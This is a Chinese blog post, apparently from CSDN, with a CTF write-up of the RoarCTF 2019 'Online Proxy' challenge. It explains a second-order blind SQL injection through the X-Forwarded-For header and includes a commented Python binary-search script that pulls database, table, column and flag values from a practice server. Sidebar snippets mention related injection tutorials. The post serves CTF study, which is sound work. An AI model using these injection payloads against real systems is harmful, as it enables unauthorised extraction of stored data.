[RoarCTF 2019]Online Proxy ip二次注入

最新推荐文章于 2024-05-12 13:45:55 发布
最新推荐文章于 2024-05-12 13:45:55 发布
阅读量560 收藏
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124464795
版权

打开题目发现hint有点像文件泄露,于是打算用伪协议下载一下各个源码

发现报错,以为是flag或者php被过滤了,于是我下别的html文件,依然如此……

用dirsearch扫描只出来两个文件一个db.php还有一个不记得去了(第二天写的wp),但是都没什么用

试了很久,发现没有https://就会报错

感觉这里不是切入点了,于是我抓包看看有没有别的信息

看到有个ip点,想着是不是SSTI,便试试X-Forwarded-For

发现可以控制Current ip,然后上一个ip就到了last ip里面,试试{{}}可不可以执行 

不行,往二次注入的方向想想,有一个Last ip肯定是有数据库存储数据的;在想会不会是二次注入,第一次将我们输入的current ip存储到数据库中,然后在Last ip这一块执行并显示,试试输入1'or'1'='1看看 

 没用……,实在找不到切入点,看看大佬的wp学习学习

第一次输入1'or'1'='1的时候会直接显示出来
第二次输入2,因为和第一次输入不同,于是第一次输入存入到数据库中,并显示在Last ip中
第三次输入2,因为和第二次输入相同,相当于模拟的ip不再变化,因此这个时候会在数据库中查找ip2的last ip,执行了查询操作,因此这个地方是我们的利用点了

先试试输入1'or'1'='1,再输入222两次试试结论

可以发现执行了操作,因为恒真就返回了1,尝试了一下这里直接构造查询语句返回的不是1就是0,看来需要盲注脚本了(这里注意cookie里面的trach_uuid,如果每次请求他不同的话,是不会和上一个会话联系在一起的,因此每次post请求必须带上cookie) 

这里贴上别人的脚本并分析了一下(感觉自己知道如何写,怎么构造,但是就是手动能力太差,必须要自己多实践了,不然没有wp后我连脚本都写不出来)

# coding:utf-8
import requests
import time
url = 'http://node4.buuoj.cn:28219/'

res = ''
for i in range(1,200):
    print(i)
    left = 31#二分法快速查找关键字
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:#盲注,利用substr将查询到的字符切割,用ascii函数转化为ascii码,利用二分法的中间值比大小直到查询成功
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
        headers = {#第一次请求,是用我们的payload,防止cookie被刷新因此我们头部请求的时候必须要带上cookie
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',#带cookie防止刷新重置
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)#头文件传输方法

        payload = '111'
        headers = {#后面就是相同cookie的二次三次输入,只为了执行第一次payload的查询语句
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)

        payload = '111'
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)


        if r.status_code == 429:#buu特色
            print('too fast')
            time.sleep(2)
        if 'Last Ip: 1'  in r.text:#payload语句用的都是大于,如果大于中值,则中值加一赋给最小值
            left = mid + 1
        elif 'Last Ip: 1' not in r.text:#不小于则中值给最大值
            right = mid
        mid = left + ((right-left)>>1)#右移1,代表除2 可以直接mid=(left +right)//2
    if mid == 31 or mid == 127:
        break
    res += chr(mid)#chr函数。ascii转化为字符
    print(str(mid),res)
    time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn

注意我们本身所在的数据库里面没有flag,在另一个数据库里面,因此用到了 information_schema.schemata库来查找所有的数据库

感觉也见过很多盲注脚本了,要自己找时间练练了 

-栀蓝-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
proxypool:Golang实现的IP代理池
02-03
Golang实现的IP代理池 采集免费的代理资源为爬虫提供有效的IP代理 随着时间的推移观星人 版本更 2019年12月18日v2.4感谢 添加代理网站ip3306,plp-ssl两个 更数据库结构,添加创建时间和更时间 更ip.go当中...
DVWA-命令注入 全级别教程
weixin_44716769的博客
09-08 4705
命令注入 实验准备 在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因,底层系统是中文GBK编码所致。 在输入127.0.0.1测试时,发现如下乱码 在PHPstudy的安装目录下(每个人不同,本例中)目录下,有个dvwaPage.inc.php文件,打开文件在277行修改,将UTF-8改为GBK或者GB2312即可。 重输入命令,不再乱码 Low等级 查看源码 stristr(string,search,before_search) s
[RoarCTF 2019]Online Proxy 盲注
scrawman的博客
01-26 3072
[RoarCTF 2019]Online Proxy bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。 盲注: import requests url = "http://node4.buuoj.cn:26940//" head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 577
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
DNSlog注入姿势
qq_43681802的博客
02-08 629
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
[RoarCTF 2019]Online Proxy
m0_63045593的博客
04-22 1893
[RoarCTF 2019]Online Proxy <!-- Debug Info: Duration: 0.40283489227295 s Current Ip: 10.244.80.46 --> 看到ip联系一下 xff(识别ip的)可以自己修改 知识点 一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。 跟SQL有关 挨个测试为单引号闭合 执行原理 数据在写入数据库时 1.127.0.0.1‘or’1在写入时为 Current
Vivado使用技巧(10):编辑与改写IP核源文件
热门推荐
FPGADesigner的博客
08-18 2万+
有些时候,根据设计需求可能会想要修改IP核生成的源文件(只能修改未加密文件),包括HDL文件和XDC约束文件。 这种修改不能直接修改源文件,因为在后续设计流程中,IP可能会复位或重生成,导致修改操作被复原。本文将介绍编辑与改写IP核源文件的方法,不过仍然需要注意两点: 某些IP核包含其它的层次化子IP核,这类IP核源文件不可修改; IP核的Core Cotainer特性必须被禁用。 ...
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 922
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
JsProxy A js proxy online
04-21
A js proxy online or js packer offline.See help.html for more information.
MySQL Proxy(解决注入的另一思路)
09-14
MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
解决vue中使用proxy配置不同端口和ip接口问题
10-16
主要介绍了解决vue中使用proxy配置不同端口和ip接口问题 ,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
ProxyIP.exe
11-24
可以换IP
[Nacos] 业务实例如何指定IP注入Nacos
SymbolWoo的博客
02-18 4849
使用 Spring Cloud Alibaba 搭建微服务,业务实例默认使用内网 IP 注册到 Nacos 服务端,这样在跨局域网时会无法请求成功。那如何解决呢?答:指定外网 IP 注册到 Nacos 上。下述方法来自网络,版权归原著作人,本人只是搬运工+实践者!
东软古董级防火墙批量注入IP之脚本浅谈,仅供参考
sunboychb的专栏
08-10 1617
东软配置脚本
【伪造IP】【二次注入】【二次编码注入
==
02-28 127
伪造IP 普通传递&引用传递 function addself ($parm){ $parm++; } $a=10; addself($a); echo 'a的值'.$a;#10 function addself (&$parm){ $parm++; } $a=10; addself($a); echo 'a的值'.$a;#11 Ctrl +ALT+L 恢复自动页面格式化 LESS19 INSERT INTO `security`.`referers` (`referer
字符画生成网站 ascii字符画
最新发布
wow_awsl_qwq的博客
05-12 245
_____ / ___/__ ___ / /__/ _ \/ _ \ \___/ .__/ .__/ /_/ /_/
如何防止WordPress网站内容被抓取
AIDigital的博客
05-09 449
最近在检查网站服务器的访问日志的时候,发现了大量来自同一个IP地址的的请求,用站长工具分析确认了我的网站内容确实是被他人的网站抓取了,我第一时间联系了对方网站的服务器提供商投诉了该网站,要求对方停止侵权行为,然而这只能暂时性的解决问题,为了避免以后再有意外发生,我结合了咨询Hostease的技术支持得到的反馈以及自己从网上了解到的信息,做了以下的优化,分享出来希望能对大家有一些帮助。抓取工具在抓取网站内容的时候,需要依赖网站的RSS feed,对RSS feed做一些小的调整,就可以防止内容被抓取。
vue配置proxy代理 以及axios二次封装及使用
07-16
要在Vue项目中配置proxy代理以解决跨域问题,并且使用Promise二次封装Axios发送请求,你可以按照以下步骤进行操作: 1. 在项目的根目录下创建一个 `vue.config.js` 文件。 2. 在 `vue.config.js` 文件中添加以下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值